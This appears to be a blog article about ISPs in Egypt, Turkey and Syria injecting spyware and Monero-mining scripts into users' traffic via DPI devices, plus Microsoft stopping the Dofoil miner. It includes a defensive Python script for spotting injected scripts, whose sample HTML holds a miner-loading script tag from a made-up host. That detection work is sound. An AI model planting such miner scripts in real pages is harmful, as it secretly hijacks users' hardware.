ISPs Caught Deploying Cryptocurrency Mining Malware

Cryptocurrencies are booming, and it is easy to see why: they offer users benefits such as transactions without a middleman and a degree of anonymity.

That is why more and more people are trading them, but the boom also brings traps. The concern is no longer only hackers or dodgy websites; government entities deserve scrutiny too, as in the recently reported case of Internet Service Providers (ISPs) injecting mining malware into their customers' traffic, apparently in collaboration with governments and state agencies.

Syria, Egypt, and Turkey Fingered

The research located this activity in Turkey, Syria, and Egypt. In Turkey and Syria, the network operators were covertly injecting surveillance malware into users' downloads; in Egypt, related technology was used to inject cryptocurrency-mining scripts into users' browsers.

The reports concluded that these operators are using Sandvine deep packet inspection (DPI) devices, which let an ISP intercept and manipulate the traffic generated by end users. This packet-by-packet technology is flexible enough to prioritize, degrade, block, inject into and log many different kinds of web traffic.

The injection capability was used at different levels. On Türk Telekom's network, Sandvine PacketLogic devices were used to redirect targeted users to pages serving spyware; in Syria the same approach was used, but users were redirected instead to malicious versions of antivirus software bundled with government-made malware.

Telecom operators in Egypt, however, went furthest in turning the technology to their own benefit: they have been covertly injecting mining scripts into the unencrypted web pages users visit.

Citizen Lab's research inferred that the providers were running a scheme it named "AdHose", which raises money by covertly mining the privacy-focused altcoin Monero in users' browsers.
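The injection described above only works because a DPI box sitting in the path can rewrite an unencrypted response before it reaches the browser. One practical way to check whether your own ISP is doing this is to fetch a page over plain HTTP through the suspect network and diff it against a reference copy of the same page (for example one fetched over HTTPS, or from a vantage point outside the ISP). The script below is an added example, not code from the article or from Citizen Lab: it parses both copies, lists the `<script>` elements present only in the observed copy, and flags external script hosts that do not belong to the page's origin. Both HTML samples are constructed for the demo, and the host name `miner.example` is made up.

```python
"""Spot <script> elements injected into a web page in transit.

Added example (not from the article or Citizen Lab): compare a page copy
observed through the suspect network against a trusted reference copy and
report scripts that exist only in the observed copy.  The two HTML samples
are constructed for the demo; the host "miner.example" is fictitious.
"""
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urlparse

Script = Tuple[str, str]  # (src attribute or "", inline body or "")


class ScriptCollector(HTMLParser):
    """Record every <script> element as (src, inline_text)."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: List[Script] = []
        self._in_script = False
        self._src = ""
        self._buf: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            self._src = dict(attrs).get("src") or ""
            self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers script bodies through handle_data as raw text.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.scripts.append((self._src, "".join(self._buf).strip()))


def collect_scripts(html: str) -> List[Script]:
    """Return all script elements of a page, in document order."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


def injected_scripts(reference_html: str, observed_html: str) -> List[Script]:
    """Scripts present in the observed copy but absent from the reference."""
    expected = set(collect_scripts(reference_html))
    return [s for s in collect_scripts(observed_html) if s not in expected]


def foreign_script_hosts(scripts: List[Script], page_host: str) -> List[str]:
    """Hosts of external scripts that do not belong to the page's own origin."""
    hosts: List[str] = []
    for src, _ in scripts:
        host = urlparse(src).hostname  # None for relative paths like /static/app.js
        if host and host != page_host and host not in hosts:
            hosts.append(host)
    return hosts


# Constructed reference copy of the page, as served by the origin.
REFERENCE_HTML = """<html><head><title>News</title>
<script src="/static/app.js"></script></head>
<body><p>Top story</p></body></html>"""

# Constructed copy as observed through the suspect ISP: two extra scripts,
# one loading a miner library from a fictitious host and one inline starter.
OBSERVED_HTML = """<html><head><title>News</title>
<script src="/static/app.js"></script>
<script src="http://miner.example/lib.js"></script>
<script>var m = new Miner("SITE-KEY"); m.start();</script></head>
<body><p>Top story</p></body></html>"""


if __name__ == "__main__":
    found = injected_scripts(REFERENCE_HTML, OBSERVED_HTML)
    for src, body in found:
        print("injected:", src or body[:60])
    print("foreign script hosts:", foreign_script_hosts(found, "news.example"))
```

Two caveats when using a check like this for real. First, it only applies to pages served over plain HTTP: a middlebox cannot alter a page delivered over HTTPS without breaking the browser's certificate check, which is exactly why this kind of injection targets unencrypted traffic. Second, a difference between the two copies is a lead, not proof; sites that serve region-specific or A/B-tested content will also produce differences, so repeat the comparison across several pages and times before concluding the network is tampering with traffic.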

A battle won by Microsoft

Last week, Microsoft's security researchers blocked a massive mining-malware outbreak. The fast-spreading trojan was found hitting Russia, Turkey and Ukraine, affecting about half a million machines.

The malware, dubbed "Dofoil", carries a coin-mining payload that hijacks victims' hardware to mine the cryptocurrency Electroneum.

Microsoft attributed the trend to the rising value of cryptocurrencies like Bitcoin, which is pushing malware operators to build mining components into their attacks. Coin miners are increasingly replacing ransomware as the payload of choice, and scammers are now adding mining scripts to the fake tech-support pages they lure people to.

These incidents are worrying because they show that users need to worry not only about hackers and cybercriminals but also about their own government. The outlook is worse still for those who have no alternative to Egyptian internet services, since they must contend with their own ISP mining on their computers as well.

Ali Qamar is a privacy, blockchain and cybersecurity enthusiast; his work has been featured in many major tech and security blogs including InfosecInstitute, Hackread, ValueWalk, Cryptodaily, Intego, and SecurityAffairs, to name a few. He currently runs SpyAdvice.com. Follow Ali on Twitter @AliQammar57